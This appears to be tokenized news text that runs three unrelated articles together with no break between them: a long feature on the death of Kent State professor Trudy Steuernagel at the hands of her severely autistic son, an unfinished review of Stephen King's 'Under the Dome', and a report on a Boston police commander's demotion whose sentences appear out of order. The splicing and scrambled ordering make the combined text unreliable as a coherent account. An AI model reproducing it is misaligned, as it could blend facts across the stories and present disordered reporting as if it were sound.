" Except for the speech delay , you would never have suspected he had autism , " Scott says .
" It was easier to explain his poor performance on tests by saying he was autistic .
We felt he was clearly intelligent .
He just had no interest in demonstrating for adults what he knew or could do . "
If Trudy grieved or felt frightened for Sky , she did not show it .
The Internet was still primitive at the time , but she joined autism mailing lists and searched for resources and services .
She also became more protective .
After the diagnosis , Scott noticed that Trudy turned inward with Sky ; where she once carried him facing out to the wide world , she now held him facing her heart .
Scott and Trudy enrolled him in Kent 's special - needs preschool when he turned 4 .
At the end of that year , his teacher reported that he showed many of the signs of autism :
His play was solitary , his speech delayed , and he avoided eye contact .
She also noted that he had a problem with aggression but was learning to handle his frustration .
Trudy and Scott worried anew .
Was aggression another symptom of autism ?
Or was it just a symptom of childhood ?
Why was the sweet boy who once hugged everyone now hitting ?
Frustration and aggression
Information on rates of aggressive behavior in people with autism is scarce and inconclusive .
A roundup of autism research published last month in the British medical journal The Lancet cited a 2008 study that found " disruptive , irritable or aggressive behavior " in 8 percent to 32 percent of children with autism .
It did not explain the wide statistical spread , nor did it offer comparison figures for children without autism .
Doctors and teachers in Cleveland who deal with autism begin discussions of aggression with a caveat : Autism does not automatically lead to aggression .
No one wants autistic people to suffer the sort of horror - movie stigma that has plagued the mentally ill for so long .
But they do not deny the aggressive tendency exists .
" Aggression has always been part of autism , " said Leslie Sinclair , the head of the Cleveland Clinic 's Lerner School for Autism .
" Not in all [ autistic ] children , of course . "
Dr. Max Wiznitzer , a pediatric neurologist and director of the Rainbow Autism Center at University Hospitals , says there are many reasons for the aggression .
" They might also have anxiety disorders , attention deficit hyperactive disorder , mood disorders , cognitive impairment , " he says .
Sinclair and others return inexorably to the frustrations that emerge not just from the struggle to speak , but also from overwhelming sensory stimulation and the need to adhere to set rituals and routines .
For some children with autism , even a tiny deviation can lead to a violent episode .
" It is never malicious , " she says .
Scott Walker tells this story about Sky to describe his frustrations .
He was 5 or 6 and playing alone , in another room , when Trudy and Scott heard a big bang , like something had fallen or broken .
They found Sky sobbing uncontrollably .
" What happened , Sky ? "
They asked .
" What 's wrong ? "
Sky sobbed and heaved , struggling to speak .
Finally he managed to say :
" I. Don't .
Have .
Words . "
They never did figure out what had made the noise .
Behavior becomes disruptive
As Sky made his way through the elementary years , Trudy and Scott battled the Kent public school system to get the services he needed and to keep him in mainstream classes , where they felt he did better academically and socially .
But to remain there , he required a full - time aide .
" It was adversarial , " Scott says .
" They were professionals .
But they were also fully cognizant that we were asking them to dig deep in their budget for our son .
There was always a sense of , ' Gosh , what if there were 10 other autistic kids wanting these services , too ? ' "
Soon enough there were , and more .
In 1994 - 95 , just after Sky was diagnosed , Ohio reported fewer than 100 cases of autism out of almost 1.8 million students .
Last year , Ohio reported 12,640 cases out of 1.9 million students .
The Kent City Schools superintendent , Joseph Giancola , declined to talk about Sky , citing confidentiality laws .
But voluminous school records in the Portage County prosecutor 's files include positive reports from elementary school , when he spent part of the day mainstreamed with an aide .
Around the Web
In first grade , his teachers wrote : " Sky is very sweet and has a nice sense of humor . "
In third grade , his special - education teachers wrote : " What a joy it has been to be Sky 's teachers for 3 wonderful years ! "
As he grew older , and his life at home changed , behavior problems entered the picture .
A move from mainstream
Trudy and Scott separated when Sky was 9 .
Scott did not want to talk about the reasons for the separation , but he did say Sky was not one of them .
" I 'm sure our disagreements over him were an added stress , though , " he says .
That year , Scott moved to Cleveland to start medical school at Case Western Reserve University .
He says he saw Sky three times a week , at home in Kent and when Trudy brought him to Cleveland .
He knew Sky missed him .
" To the extent that Sky could choose things to talk about , what he would talk about was the next time he would see me , " Scott says .
When Sky was 10 , a teacher 's assessment found him " severely autistic . "
He avoided eye contact , followed ritualistic patterns , spoke in stressful situations with meaningless one - or two - word phrases ( " tater tots , " " top grunge " ) , splayed his hands close to his face and rocked with exaggerated rhythms .
He also angered easily .
" When forced to look or interact , [ he ] may become agitated , cry or have a temper tantrum , " the teacher wrote .
" Reaction to pain such as a fall or bump of elbow is extreme anger .
Reaction to change [ in routine ] can be extreme with excessive tantrums . "
Sky had tantrums with his parents , too .
" They were very few in number , but they were very disruptive and certainly caught our attention , " Scott says .
" Because he was smaller , we were n't afraid of escalation .
We used some physical restraint until we were at a safe place . "
Puberty often brings a spike in aggression , particularly with boys , who account for three out of four autism diagnoses .
Sky was no different .
At the beginning of seventh grade , when he was 13 , the school removed him from mainstream classes .
" Sky has continued to make progress in the academic realm , " his teacher reported , " but has started to have difficulty with appropriate school behavior . "
In October of 2003 , his aggression became such a problem that the school decided to send him home two hours early every day .
Trudy went on part - time leave from KSU ;
Sky did not return to school full time until the middle of April .
That school year , Irene Barnett , one of Trudy 's closest friends , found out that Sky was hurting his mother .
" Trudy forbade me to say anything , " Barnett says .
" I knew that if I had not respected her wishes , that would have been the end of our friendship .
Her loyalty was 100 percent to Sky . "
Trudy told Barnett that Sky was getting good medical care and his doctor was trying new psychoactive medications .
Using medication to control aggression in autistic patients is a common practice , says Sinclair of the Cleveland Clinic 's autism school .
" Some of our kids can be very obsessive compulsive , which is evidenced in rigid adherence to routines , " she says .
" And [ if ] you interrupt that , they can become aggressive .
If we can target that behavior with a particular medication that takes the edge off the need to fulfill these routines , then aggression comes down . "
Health privacy laws prevent authorities from saying which drugs were ordered for Sky , but photographs in the sheriff 's investigative files show medicine cabinets and kitchen shelves in the home laden with bottles of prescription antidepressants , anti-anxiety drugs and tranquilizers .
" Trudy believed that eventually they would get the right cocktail , and his hormones would stop surging , and it would take care of the aggression , " Barnett says .
" She did not want him in any institution .
She said there was a lot of abuse in institutions , and because Sky was not verbal he could be easily victimized . "
At about this time , Scott remembers , he began urging Trudy to consider a residential placement .
" That was a real conversation stopper , " he says .
Experience led to apprehension
Bill Steuernagel thinks
Trudy formed her negative view of institutions working at Ebensburg State School and Hospital in Pennsylvania , an institution for children then diagnosed as " hyperactive mentally retarded [ and ] trainable . "
Their father , William Steuernagel , was an administrator , and all three of his children - Marybeth , Trudy and Bill - had summer jobs there as teenagers in the 1960s .
" We took care of the patients , took them out for walks , to the pool , " says Bill .
" A lot of them were drugged .
They were considered mentally retarded , but I 'm sure some of those kids were autistic . "
Autism was first recognized as a distinct disorder in 1943 , but it took decades to emerge as a standard diagnosis .
It did not enter the Diagnostic and Statistical Manual of Mental Disorders , the standard for psychiatric diagnosis in America , until 1980 .
" Back then , if you had a child and you could n't take care of him , you 'd put him in a state home , " Bill says , referring to the 1960s and Ebensburg .
" My sister cringed at that . "
The truth comes out
In 2004 , Scott Walker moved to a small town in Wisconsin for his residency in family medicine .
Sky was 14 .
Two years later , Scott and Trudy divorced .
They maintained joint custody ;
Sky spent five weeks every summer with Scott and visited some weekends .
The rest of the year , Trudy was alone with Sky .
" Trudy was now a single parent of a child with significant needs , " Barnett says .
" But she was not a complainer .
She always used to say , ' You know , you deal with it . ' "
Trudy dealt with it by complying with Sky 's elaborate system of rituals , which ruled their days from the time she woke up until Sky went to bed .
Trudy usually slept for about four hours , then got up to exercise .
Sky woke , took the sheets and blankets off both their beds , piled them on the floor , and crawled in to sleep .
He always dressed in the same outfit : blue T - shirt , dark blue shorts , sneakers .
Trudy ordered them in multiples from Lands ' End .
The outfit made him look like a 6 - year - old with a man 's body , a visual metaphor for the childish tantrums that turned dangerous when he grew to over 6 feet tall and 200 pounds .
He loved children 's food , too .
After school , they always drove 20 miles to the same McDonald 's , where Sky ordered a Happy Meal of Chicken McNuggets and fries , followed by a vanilla ice cream cone .
Then they crossed the street to Arby 's where he ate another meal of chicken and fries .
When they got home , he watched " The Price Is Right " over and over again .
Every night , he tore paper into confetti and scattered it around the house .
Before he went to bed , he got his medicine and an M&M ice cream cone .
He said certain phrases when he felt agitated , like " Ride the roller coaster " and " Wheels on the bus . "
Trudy responded by sending him to his safe room in the basement , a small room crammed with unused games , a foosball table and Trudy 's exercise bike and mini-trampoline .
In the middle of the clutter , Sky would lie on his mattress and calm himself with his comfort foods , barbecue potato chips and Goldfish crackers .
If Trudy caught the signs too late and the agitation escalated , she calmed him with a warm bath and his favorite snack food .
When the calming rituals did not work , Sky lost control and sometimes attacked her .
Barnett thinks she was one of the few people who knew just how bad Sky 's aggression was .
Trudy 's friends did not know each other well , and she parceled out her disclosures .
A few friends and family members saw the bruises and black eyes , but Trudy always had an explanation .
" I hit my head swimming , " she told Bill once .
In the spring of 2008 , though , Sky 's attacks grew much worse , and Trudy decided to reveal - in part - what was going on .
She surprised everyone with the way she did it :
In a public essay for the student newspaper , The Kent Stater .
In " Just a Conversation , " published March 27 , 2008 , she wrote : " Life with Sky these past few years has been very isolating for the two of us .
We can't go out and do the things we used to like to do because Sky gets so overwhelmed .
Much of the time , we 're here in the house .
...
My life was dominated by trying to teach my classes , trying to run a household , trying to fit everything into the few hours he was at school .
On bad days , those few hours could turn into a few minutes .
I could n't be a friend to anyone because I physically and emotionally could not be there for them .
I had no patience with good and decent colleagues who told me how busy they were .
Busy ?
Try spending an evening sitting in a closet with your back to the door , trying to hold it shut while your child kicks it in . "
Her colleagues were stunned .
" We had no idea , " said Steve Hook , the department chair .
Molly Merriman , a KSU faculty member , tried to convince Trudy she was living with domestic violence , one of Merriman 's academic interests .
But Trudy still believed Sky would change .
Later that spring of 2008 , Sky went into a steep spiral .
He had been in special - education classes for five years , and at 16 had begun community work - experience classes , mostly doing custodial work .
He especially liked sweeping .
Even with that outlet , his tantrums and violent episodes became more frequent and intense .
Records show teachers and aides had to apply physical restraint seven times in April and May , and called Trudy to take Sky home .
They requested that she never travel more than 20 minutes away when he was at school .
On May 2 , 2008 , Sky 's violence was bad enough for the school to call the police and EMS .
At one point , a Kent police officer reached for his Taser .
Sky 's aide and Trudy both rushed to stop him .
Later , the officer saw Sky hit Trudy in the head from the back seat of her car .
" She was reluctant to admit there are outbursts at home in which she is assaulted , but made reference to a ' safe room ' she has in their home , " he reported .
The school called Trudy for meeting to discuss an intervention plan .
Afterward , she wrote a two - page letter that praised Sky 's teacher but objected to much of what the school administrators said .
" On many occasions the school 's solution when Sky was in meltdown was to call me to transport him home , " she wrote .
" I have always responded and done so , even while making the argument that this was reinforcing Sky 's behavior and getting him what he wanted . "
To go home with Momma .
Mother rejects hospitalization
Every summer , when Sky 's school was out , Scott took Sky for five weeks while Trudy taught .
Their visits always started with a week at Disney World , Sky 's favorite place .
In June 2008 , Scott took his new wife and his stepson along .
Despite this disruption of his routine , Sky did well , Scott says .
He liked his stepbrother , who was 10 , and enjoyed the long days at the park and long nights at the fireworks .
He had no episodes the whole week .
Until the final night .
Sky did not want to leave the next morning and became enraged .
Scott sent his wife and son from the room to call hotel security .
Sky started breaking furniture and mirrors , and then turned on Scott .
" It was the first time I got beat up by him , " Scott says .
" We were all scared . "
They ended up at an emergency room , where a dose of the sedative Ativan subdued Sky .
The next morning , armed with more Ativan , Scott got on a plane with his son and brought him to University Hospitals ' autism unit .
He asked them to find a residential placement for Sky .
They came up with a facility in the Cleveland area , Scott says , where they had experience dealing with autistic adults with aggression .
" But his mother did not hold the same view as I did , " Scott says .
" She came and took him out of the hospital , and it did n't happen .
She was angry , but that was nothing new . "
Scott went back to Wisconsin without Sky .
Trudy 's brother , Bill , drove up from his home in North Carolina to help with Sky for the remaining three weeks of Scott 's custody .
Fear and denial
Sky 's senior year started with seven official reports of aggressive episodes and use of physical restraints and police calls .
His food obsession , a common factor in autism , had gone out of control .
Trudy told Barnett that she hid food from Sky in the garage .
On Thanksgiving Day , Bill heard fear in Trudy 's voice for the first time .
She told him she had to hide in a closet from Sky , which was news to Bill .
He asked her if she was fearful .
" I can handle it , "
she said .
But when Christmas approached , Bill sensed she needed help and came to visit .
He took Sky to the movies a couple of times and to see the fountain at Tower City .
Sky was in great spirits - until Christmas Day .
Trudy gave him an iPod and a digital camera .
Bill gave him " The Price Is Right " game for his Wii .
It was all too much stimulation and change from his daily routine .
" Throughout the day , he had some meltdowns , " Bill says .
After dinner , even though it felt awkward to bring it up and Trudy might get angry , Bill again asked about the violence .
" Are you safe ? " he asked .
" Yes , it 's fine , " she said , and changed the subject .
A son's disability , a mother 's death
Trudy did not make it through the first month of the new year .
On Jan. 29 , 2009 , just before noon , a KSU administrator called the sheriff 's office to report that Trudy did not show up for work .
It was the first time in 33 years that she had missed a class without calling .
That morning , she missed two .
She did not answer her phone .
A dispatcher sent three deputies to Trudy 's house in Kent .
Inside , they found her on the kitchen floor , her face battered and covered with dried blood , her eyes swollen shut .
Her head rested in fresh blood .
Blood tracks led from her body toward the basement , where they found Sky huddled on a mattress .
As deputies handcuffed Sky , he screamed and thrashed so hard they had to subdue him with pepper spray .
Minutes later , he reared back and kicked a deputy in the head , hard .
The other deputies pushed him to the floor and bound his ankles and wrists together behind his back .
" Boo - boo , " he said , when a detective asked him what happened to his mother .
" Band - Aid . "
" Tummy hurt . "
Then he sprayed the detective with spit .
Emergency workers took Trudy , still unconscious , to Akron City Hospital .
She had massive trauma to her head , broken ribs , a collapsed lung , a damaged eye socket , and bite marks on her face , arms and upper legs .
The deputies took Sky to Portage County Jail , where they locked him in a suicide - watch cell .
They wrestled him into orange prisoner 's clothes ; he tore them off .
They tried again ; he tore them off again .
They gave him a blanket .
Sitting in his cell naked , with the blanket around his shoulders like a superhero cape , Sky screamed , a high - pitched wail that sounded like keening grief .
" Hurt Momma , " he said .
" Sad . "
David Doak had been sheriff for less than a month when Sky landed in his jail .
That evening , when Sky had calmed down , Doak went to see him .
He was asking Sky questions through the food slot when Sky suddenly reached through the small opening , grabbed Doak 's trousers and pulled .
" He put me off balance , almost off my feet , " Doak says .
" I mean , he was big , and he was really strong .
When his adrenaline is running , he 's a pretty tough guy . "
Doak , a man with the laid - back demeanor of a pilot flying through turbulence , had never dealt with a prisoner like Sky before .
He 'd seen plenty of wild people during his career in law enforcement , people on alcohol and drugs - or , far worse , and increasingly common in police work , mentally ill people who had gone off the medications that kept them stable .
But Sky was different .
Doak did n't know much about autism , but he could see that Sky Walker would be a high - maintenance prisoner .
He hoped Sky would not be in the Portage County jail very long .
That afternoon Doak 's deputies contacted Trudy 's family , who drove to Ohio right away .
It took longer to find a number for Scott Walker in Wisconsin .
They reached him that night .
" I was horrified , " Scott says .
He could n't believe Sky was being held in a jail cell .
" Of course , my response was to try to find some way to get him alternatively placed pending arrangements for trial . "
Scott and Trudy 's family had not spoken after the couple divorced , though they had been on good terms when Sky was a child .
After the deputy called , Scott exchanged text messages with Trudy 's niece , but says he did not speak with any of the family or feel welcome to come to Ohio .
He did not visit Sky during the two months he was in the county jail .
" The reason I did n't come out is , one , there was nothing I could do , and I was n't even going to be allowed to see Sky at that point , " he says .
" Trudy was in intensive care , and there were a number of her friends and colleagues there with her .
And I had responsibilities here . "
Attention on a dark secret
Trudy Steuernagel died without regaining consciousness .
Her Feb. 13 memorial service at KSU drew hundreds of mourners .
Thousands more read of the tragedy on autism Web sites and blogs , in newspapers and in the pages of People magazine .
Trudy 's death focused national attention on what her brother , Bill Steuernagel , calls the dark secret of autism : the violence that sometimes emerges with puberty , especially in boys .
Bill wondered why he had not heard much about aggression in autism before Trudy 's death .
Then he decided the autism community feared stigmatizing the disorder .
In some ways , he understood .
But good intentions can have unintended consequences , and in this case the public silence had a tragic one :
Many parents who endure violent outbursts from their autistic children feel very much alone .
Trudy 's death spurred some to break their silence .
Ann Bauer , known for her writing on autism , described the horrific violence her once - sweet son unleashed on her and others in an online essay titled " The Monster Inside My Son . "
On news Web sites , including The Plain Dealer 's , stories about Sky and Trudy brought responses from parents who said they feared the same thing could happen to them .
" My son is 22 and has autism , mental retardation and is non-verbal , " wrote one mother .
" He has gotten quite violent with me in the past , severely and repeatedly slamming my head into the floor or head butting me until I was able to escape .
I have been lucky and I know it .
He does n't mean to hurt me and he attacks without warnings .
I am currently looking into residential placement for my son , but it is a heart - wrenching decision . "
A case of murder
Two weeks after Trudy died , a Portage County grand jury indicted Sky on two counts of murder .
Trudy 's family hired Ravenna attorney Errol Can and also brought in Gian De Caris and Mark Stanton , Cleveland defense lawyers who specialize in mental health cases .
De Caris had never had an autistic client and was n't sure what to expect .
" After five minutes , it was clear that he was on the severe end of the spectrum and had no idea what was going on , " De Caris says .
The prosecutor 's office also recognized this , but an unnatural death had occurred and the law required certain steps .
First , a psychologist had to evaluate Sky to determine competency .
Could he understand his legal situation and assist his lawyers in his own defense ?
His first court appearance , via video from the jail , offered a preliminary answer .
Sky , upset by the unfamiliar proceeding , started flailing and spitting , until deputies strapped him into a restraint chair and put a spit mask over his head .
The photo in the next day 's local newspaper made Sky look like Hannibal Lecter in " The Silence of the Lambs . "
It brought a new wave of national media and Internet attention .
On autism Web sites , writers repeated the same outraged questions .
Why did a low - functioning autistic boy have to go through the legal process when he clearly had no idea what he had done ?
And why was Sheriff Doak holding him in a jail cell ?
Doak had the same concerns , but there was nowhere else for Sky to go at that point .
" We knew he did n't belong in a jail cell more than anybody , " he says .
For the two months
Sky remained in the jail , Doak kept him in a cell in the booking area because he did n't think Sky would be safe with the general population .
" They would n't be too happy with the screaming and spitting , " Doak says .
" Sky was n't a bad kid .
I liked him .
But he was a handful . "
Sky 's cell was the size of a small office cubicle , with half the space taken up by a toilet .
To help keep him calm , Doak and his staff bent many rules .
They allowed family to visit Sky outside the normal visitation area and times .
They let Sky wear his usual outfit of blue shorts and T - shirts , and parked a TV outside his cell so he could watch DVDs of " The Price Is Right . "
They put him on a tight routine to help him feel secure , and used picture cards to show him his schedule .
When he grew agitated , they calmed him with barbecue chips and Ativan .
They continued his other prescribed medications .
Doak and his staff worked with Bill Steuernagel , who took on the parental role in Scott 's absence .
Bill brought Sky McDonald 's chicken and fries almost every day , and gave the sheriff two lists Trudy had written to explain Sky 's rote phrases .
She called it " Sky - speak . "
" If Sky says the following , " she wrote , " it means he is unhappy : Dairy Queen ; Ride the Roller Coaster ; ' Dr. Seuss 's ABC ' ; DVD on , ' Cat in the Hat ' on . "
A second list meant he was happy : " Trolley school bus ; Short neck giraffe ; Sixteen J's ; Four whammies , Eric . "
At the bottom of the list , Bill added : " If he is unhappy , avoid eye contact and speaking to him .
If communication is necessary , speak softly . "
The corrections officers in the booking area began to develop a relationship with Sky .
Sometimes , though , their precautions failed .
The prosecutor 's investigative file contains several reports detailing Sky 's outbursts .
" Sky would try at times to kick or strike officers while taking a shower , " one reads .
" Sky verbalized , ' No guts , no glory , ' [ and ] spit a few times while [ the ] officer protected himself with a riot shield .
Sky kept yelling and kicking . "
Once , he attacked Bill when he took him to the shower and missed several signals that Sky was agitated .
" It was the first time I had seen the violence , " Bill says .
" I thought about my sister , going through that . "
Like Bill , Doak and the staff knew Sky did n't mean to hurt anyone .
" I have no tolerance and no sympathy for people who murder , " Doak says .
" But there was no intent there . "
Every morning , Doak went into work praying that someone had found a better place for Sky .
v " Everybody searched , " says De Caris , Sky 's lawyer .
" The prosecutor 's office , the county MRDD board .
I used my local contacts , I did Internet searches , I called directors of facilities . "
The search kept turning up empty .
Because of the severity of the crime , they needed to find a locked unit in a facility for the developmentally disabled .
" There were different places they would find , and it would look good , and then it would turn out they did n't have a lockdown .
We 're talking two or three beds in the entire state , " Doak says .
Finally they found Northwest Ohio Developmental Center in Toledo , one of 10 facilities run by the state .
On April 1 , the Portage County Board of Developmental Disabilities sent a bus to the jail .
The jail staff stood outside to say goodbye to Sky , some with tears in their eyes .
Sky , giddy to be outside and going on a trip , rode happily with his Uncle Bill all the way to Toledo .
Finding a place for all the Skys
The two - month search for a place for Sky mirrored what many parents nationwide face as their severely autistic children become adults .
Federally mandated educational services covered by public funding end at age 22 .
" All of a sudden , the kids are growing up and the parents are saying , ' Now what do we do ? ' " says Rainbow Autism Center 's Wiznitzer .
" Because autism is a spectrum , there 's going to need to be a wide range of options for adult living , " says Susan Ratner , assistant director for special projects at Bellefaire JCB in Shaker Heights , which is in the early stages of developing a small adult - residential facility .
When the Bellefaire staff looked for models around the country , however , they could not find many .
" What has clearly come out is that there are big gaps in adult services , " Ratner says .
The search process is even more complex and sensitive when violence is involved .
In 2001 , the Autism Society of America sounded the alarm on what it called a national crisis : a critical shortage of services and facilities for adults with autism .
In 2007 , when not much had changed , it updated its call for action .
Parts of the ASA 's report read like an account of Trudy and Sky 's lives .
" In a behavioral , out - of - control crisis , individuals with autism can be scary , " it says .
" Parents are desperate .
Aging caretakers ( often single mothers , often living alone with their middle - aged child ) , knowing how difficult it is to adequately care for an adult with autism , are often prisoners in their own homes . "
De Caris came to the same conclusion .
" This is more common than I ever imagined , " he says .
" The facilities are just not out there - not at the level that 's going to be needed .
What 's going to happen to all these children as they get older , and their parents who are their primary caregivers disappear ?
Even at facilities that do exist , the cost is outrageous .
If you 're making a typical salary , how do you afford that ? "
Trudy had known she could not care for Sky forever .
She had planned to keep him in school as a full - time student as long as she could , so that her health insurance would cover him .
But she wanted to retire within a few years and started to look for a place for Sky .
It became clear how difficult that would be .
The only facility Trudy liked was a private one in Charlottesville , Va. , near her sister and nieces .
It charged an entry fee of almost $ 58,000 , in addition to about $ 3,000 a month .
That was one problem , but another was bigger , she told Bill :
Sky 's anger had to be under control before they would take him .
In the meantime , Trudy had also been planning for Sky 's life beyond school .
A caseworker with the Portage County Board of Developmental Disabilities had told her Sky could do well at their sheltered workshop , Portage Industries , perhaps doing the custodial work he enjoyed .
They planned to ease Sky into it with a slow , three - year transition from school .
Trudy did not ask for help with finding
Sky a residential placement , however .
The caseworker , George Paroz , says Medicaid and the county offer financial assistance for both in - home help and residential placement .
These programs have waiting lists , some of them long , but if safety becomes an issue , families are moved to the top for an emergency placement .
" If she had said , ' He can't live here anymore , he 's a danger to me , ' that would have been an emergency placement , " Paroz says .
" And if it needs to be done , it gets done , and we find the money . "
But Trudy had never said it .
" Trudy was of the belief that she could handle him best , " Paroz says .
The judge decides
Two psychologists reported to the court that Sky was not competent to stand trial and would never be restored to that level of competence .
Both confirmed that Sky was autistic , and added a new diagnosis , that he was mentally retarded .
" Trudy would never have accepted that Sky was retarded , " Bill says .
" Eighty percent of the time , when he's in a good mood , the kid is very smart . "
On Sept. 14 , after listening to evidence that included a DNA match of Trudy 's blood to the blood found on Sky 's feet , Portage County Common Pleas Judge John Enlow ruled that Sky murdered his mother .
But , since Sky was not competent for trial , Enlow dismissed the charges and ordered him to remain at the Northwest Ohio Developmental Center .
The commitment was , in essence , a life sentence , because it is unlikely the court will ever release him .
Medicaid pays $ 460 a day to shelter him at Northwest , a campus with spacious lawns , outdoor play equipment and nine cottages that can accommodate 162 residents .
Sky occupies the one locked facility , sometimes sharing it with other residents .
He has two aides on duty at all times .
He continues to have violent episodes .
He also has occasional visitors .
His father says he has visited several times .
His cousins and aunt have been to see him .
His uncle , Bill , has visited several times , bringing him his favorite McDonald 's foods .
When the judge allowed Sky outside the cottage , Bill began taking him for walks in the gym on campus .
The visits do n't last long .
Bill usually watches
Sky play his " Price Is Right " game .
" He 'll acknowledge you , he might like the chicken and fries , " Bill says .
" But there really is no communication . "
Sometimes , Bill wonders if Sky knows what happened to his mom , or understands why she is no longer part of his life .
The aides tell Bill that Sky has said , " Momma dead , " several times , but no one knows where he heard those words .
Scott believes
Sky understands what happened .
On three visits , he says , Sky has said , " Do n't hit Momma , " or " Sky sorry hit Momma , " each time in response to Scott 's questions about his new rooms .
" And he 's almost crying as he says these things , " Scott says .
Scott is not sure
Sky understands death , however .
" The closest he came was when the family dog died , " Scott says .
" His summation of it was , well , she was with her puppies .
I have no idea why he thought the puppies were synonymous with heaven , but he did , and there was an air of finality in the way he made that pronouncement . "
On one visit , Sky said to Scott , " Want Momma . "
" And of course I told him , ' Momma loves you very much . ' "
A final resting place
Bill Steuernagel still has the letter Trudy wrote and locked in her safe .
At first , Trudy 's family decided not to reveal to outsiders what it said .
One of Sky 's lawyers told them it might give autism a black eye .
Another said it might make Trudy look bad .
Recently , the family reconsidered .
" I know my sister well enough that this just did n't come out of nowhere , " Bill says .
" She meant for it to be read . "
So Bill read it aloud , stumbling as he focused through tears on his sister 's words .
" To whom it may concern :
" If this letter has been opened and is being read , it is because I have been seriously injured or killed by my son , Sky Walker .
I love Sky with my whole heart and soul and do not believe he has intentionally injured me .
I have tried my best to get help for him and to end the pattern of violence that has developed in this home .
I believe my best has not been good enough .
That is my fault , not Sky's .
Numerous people know about the violence and many have witnessed it .
We have all failed Sky .
I do not want him to be punished for actions for which he is not responsible .
" Trudy Steuernagel . "
Bill and his family buried Trudy 's ashes at Standing Rock Cemetery in Kent , in a plot overlooking the Cuyahoga River .
Her headstone , carved to look like an open book with a dove hovering above , carries her inscription on the left - hand page : " Momma / Gertrude ' Trudy ' Steuernagel / Aug. 25 , 1948 / Feb. 6 , 2009 . "
The facing page reads : " Son / Sky A. Walker / Nov. 15 , 1990 , " with a blank space left for the time he joins her .
“ Under the Dome ” gravely threatens Stephen King ’s status as a mere chart - busting pop cultural phenomenon .
It has the scope and flavor of literary Americana , even if Mr. King ’s particular patch of American turf is located smack in the middle of the Twilight Zone .
It dispenses with his usual scatology and trippy fantasy to deliver a spectrum of credible people with real family ties , health crises , self - destructive habits and political passions .
Even its broad caricatures prompt real emotion , if only via the damage they can inflict on others .
Though the book ’s broad conspiratorial strokes become farfetched , its ordinary souls become ever more able to break hearts .
This book has the heft of a brick .
It also has a premise that can be summarized in seconds .
On a beautiful autumn day in Maine a transparent dome materializes over the town of Chester ’s Mill .
Once the Dome falls , all vestiges of normal life are suspended .
Things run amok .
They get scary .
The townsfolk become fate ’s playthings .
And Mr. King , who can manipulate this crisis in any way that occurs to him , becomes a kid in a candy store .
The premise provides so many options that Mr. King ’s decisions about how to tell this story are of special interest .
The King book that is most readily brought to mind by “ Under the Dome ” is n’t an earlier large - scale apocalyptic fantasy like “ It ” or “ The Stand ” ; it ’s “ On Writing , ” the instructive autobiographical gem that cast light on how Mr. King ’s creative mind works .
In the spirit of “ On Writing , ” “ Under the Dome ” takes a lucid , commonsense approach that keeps it tight and energetic from start to finish .
Hard as this thing is to hoist , it ’s even harder to put down .
Consider the book ’s step - by - step way of defining the Dome .
Mr. King is n’t about to do the easy thing , which would be to give a straightforward description of what it is and how it works .
Instead he offers a textbook demonstration of how to make action and explication one and the same .
First step : A woodchuck on the ground and a pilot in the air named Chuck are sudden victims of the Dome ’s guillotinelike slicing descent .
“ One thing I ’ll tell you about my son , ’’ Menino said .
“ He does n’t come back to me and say , ‘ Dad , this guy is a real SOB , ’ or ‘ He ’s a guy who does n’t do his job . ’ ’’
In an interview , the mayor said he had no role in the decision to demote Perkins , and said he and his son never talk about department business .
The younger Menino has been on the force since 1994 , and assigned to the intelligence center since July 2006 .
The younger Menino is widely regarded by his colleagues in the department as a detective who , while working some coveted assignments , is a hard - charging officer who relishes the often thankless work of the street .
There has never been any indication that he has looked to his father for help .
The demotion of Perkins and the outcry it provoked inside the Boston Police Department underscore the tenuous line that Mayor Menino walks while having a son on the city payroll , working in a high - visibility department in which rank - and - file members scrutinize every personnel maneuver in search of political influence .
In the months before Perkins ’s demotion , Menino ’s overtime , which had been among the highest in the Intelligence Center , and use of unmarked police cruisers had fallen off amid a department - wide budget crackdown that Perkins implemented inside the unit .
A police official close to Davis acknowledged that Perkins asked the commissioner during their private meeting whether his dealings with Detective Menino played a role in his firing .
Davis did not respond to Perkins , the official said .
While all police commanders serve at the discretion of the commissioner , Davis ’s actions , taken on May 29 , still have some members of the department hypothesizing that the trigger was the relationship between Perkins and one of the detectives he supervised , Detective Thomas M. Menino Jr. , the mayor ’s son .
Asked recently why he demoted Perkins from a command position he had appointed him to , Davis declined to offer any reasons , saying he does n’t comment on transfers he makes inside the department .
Boston Police Commissioner Edward F. Davis removed Earl O. Perkins as commander of the Boston Regional Intelligence Center , reduced his rank from deputy superintendent to sergeant detective , and cut his salary by about $ 35,000 .
Davis offered no public explanation at the time , and department officials with direct knowledge said he gave Perkins no reasons when he summoned him in for the demotion .
A senior Boston police commander was recently demoted as head of the department ’s elite and well - regarded intelligence - gathering unit , a surprise decision that has sparked questions among the ranks over whether City Hall was exerting an unusual level of influence over the management of the police department .
Menino said in the Globe interview that he reviews all the police commissioner ’s appointments or demotions before the decisions are announced publicly .
However , he said he never overrules the commissioner ’s recommendations .
Unlike with Perkins , however , those demotions were not a surprise : Coleman had faced criticism for a low clearance rate in the Homicide Squad , which he headed .
Harrington and Aquino - Gaines were demoted six months after Davis took over and wanted to create his own command staff , rather than work with one he had inherited from the previous commissioner .
In May , during his latest command reshuffle , Davis demoted another deputy , Colm Lydon , who officials said asked to be demoted to lieutenant detective .
Demotions from the command staff are not common in the department .
Since Davis became commissioner in December 2006 , he has demoted three deputies and one superintendent in addition to Perkins .
In 2007 , he demoted both Daniel Coleman and Gladys Aquino - Gaines to sergeant detective and Superintendent Robert Harrington to lieutenant .
Perkins , who is now assigned to the department ’s gang unit , declined a request for an interview because he did not have permission from the department to discuss his demotion .
Detective Menino also declined to be interviewed .
In demoting Perkins , Davis relied on his unilateral authority as commissioner to decide who serves in his command staff in the role of superintendents and deputy superintendents .
Supervisors below them - captains , lieutenants , and sergeants - earn their rank through the civil service process , which requires officers to take a test to show they qualify for the positions .
Boston police officers are barred from speaking with the news media without department approval , but many privately said that , four months later , Davis ’s action still evokes confusion and conjecture among members of the commissioner ’s command staff .
That confusion deepened when Mayor Menino , during a campaign debate in September , praised Boston ’s record in guarding against terrorist attacks , noting that the city had been given an award last year from the US Department of Homeland Security .
Perkins was the officer picked to go to San Francisco to accept the award on behalf of the Intelligence Center .
The senior Menino , who was briefed by Davis on the changes in the police command staff two days before they were made , said he told Davis , “ It ’s your decision .
I ’m not going to get involved in that .
If I get involved in that , it ’s a political decision , and I have never gotten involved in a political decision on any appointments . ’’
Menino blamed campaign politics for the questions being raised now .
He pointed out that a key union representing police superior officers endorsed his opponent , Michael F. Flaherty , during the preliminary campaign .
